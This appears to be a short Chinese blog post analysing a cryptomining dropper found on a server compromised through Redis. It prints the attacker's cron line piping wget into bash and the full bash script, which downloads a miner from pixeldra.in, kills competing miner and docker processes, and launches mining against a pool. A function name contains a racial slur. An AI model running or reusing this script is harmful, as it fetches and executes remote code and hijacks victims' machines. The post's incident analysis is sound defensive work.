一个黑客挖矿脚本的分析

4770阅读 0评论2018-09-28 forgaoqiang
分类:网络与安全

发现有人利用redis权限写入挖矿脚本

xxx(被入侵的主机):6379> get weaponZ

点击(此处)折叠或打开

  1. "\n*/7 * * * * wget -q -O- --no-check-certificate | bash\n"


点击(此处)折叠或打开

  1. #!/bin/bash
  2. PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin
  3. getLittletrump(){
  4.     ARCH=$(uname -i)
  5.     if [ "$ARCH" == "x86_64" ]
  6.     then
  7.         rm -rf /tmp/littletrump*
  8.         wget https://pixeldra.in/api/download/VgPwWK --no-check-certificate -O /tmp/littletrump
  9.             if [ $? -ne 0 -a $PS2 -eq 0 ];
  10.             then
  11.             curl -sk https://pixeldra.in/api/download/VgPwWK -o /tmp/littletrump
  12.             fi
  13.     elif [ "$ARCH" == "i386" ]
  14.     then
  15.         rm -rf /tmp/littletrump*
  16.         wget https://pixeldra.in/api/download/NxQkhz --no-check-certificate -O /tmp/littletrump
  17.             if [ $? -ne 0 -a $PS2 -eq 0 ];
  18.             then
  19.             curl -sk https://pixeldra.in/api/download/NxQkhz -o /tmp/littletrump
  20.             fi
  21.     else
  22.         rm -rf /tmp/littletrump*
  23.         wget https://pixeldra.in/api/download/VgPwWK --no-check-certificate -O /tmp/littletrump
  24.             if [ $? -ne 0 -a $PS2 -eq 0 ];
  25.             then
  26.             curl -sk https://pixeldra.in/api/download/VgPwWK -o /tmp/littletrump
  27.             fi
  28.     fi
  29. }

  30. killNiggiz(){
  31.     ps -ef | grep crypto-pool | grep -v grep | awk '{print $2}' | xargs kill -9
  32.     ps -ef | grep nanopool | grep -v grep | awk '{print $2}' | xargs kill -9
  33.     ps -ef | grep supportxmr | grep -v grep | awk '{print $2}' | xargs kill -9
  34.     ps -ef | grep minexmr | grep -v grep | awk '{print $2}' | xargs kill -9
  35.     ps -ef | grep dwarfpool | grep -v grep | awk '{print $2}' | xargs kill -9
  36.     ps -ef | grep xmrpool | grep -v grep | awk '{print $2}' | xargs kill -9
  37.     ps -ef | grep moneropool | grep -v grep | awk '{print $2}' | xargs kill -9
  38.     ps -ef | grep xmr | grep -v grep | awk '{print $2}' | xargs kill -9
  39.     ps -ef | grep monero | grep -v grep | awk '{print $2}' | xargs kill -9
  40.     ps -ef | grep udevs | grep -v grep | awk '{print $2}' | xargs kill -9
  41.     ps -ef | grep udevd | grep -v grep | awk '{print $2}' | xargs kill -9
  42.     ps -ef | grep docker | grep -v grep | awk '{print $2}' | xargs kill -9
  43.     ps -ef | grep hashvault | grep -v grep | awk '{print $2}' | xargs kill -9
  44.     ps -ef | grep moneroocean | grep -v grep | awk '{print $2}' | xargs kill -9
  45.     ps -ef | grep evolutions | grep -v grep | awk '{print $2}' | xargs kill -9
  46.     skill -KILL crypto-pool
  47.     skill -KILL nanopool
  48.     skill -KILL supportxmr
  49.     skill -KILL minexmr
  50.     skill -KILL dwarfpool
  51.     skill -KILL xmrpool
  52.     skill -KILL moneropool
  53.     skill -KILL xmr
  54.     skill -KILL monero
  55.     skill -KILL udevs
  56.     skill -KILL udevd
  57.     skill -KILL docker
  58.     skill -KILL hashvault
  59.     skill -KILL moneroocean
  60.     skill -KILL evolutions
  61. }

  62. killNiggiz

  63. PS2=$(ps aux | grep littletrump | grep -v "grep" | wc -l)
  64. if [ $PS2 -eq 0 ];
  65. then
  66.     getLittletrump
  67. fi
  68. chmod +x /tmp/littletrump
  69. chmod 777 /tmp/littletrump
  70. if [ $PS2 -eq 0 ];
  71. then
  72. /tmp/littletrump -o pool.t00ls.ru -k -B
  73. fi
函数名称居然叫做'杀死黑鬼',而且挖矿程序名称叫做“小川普”感觉是老美的家伙干的,挺猥琐的杀死其他人的挖矿进程,然后启动自己的进程挖矿


上一篇:PPC架构虚拟主机体验
下一篇:MQTT Essential 细节笔记总结(深入理解MQTT细节)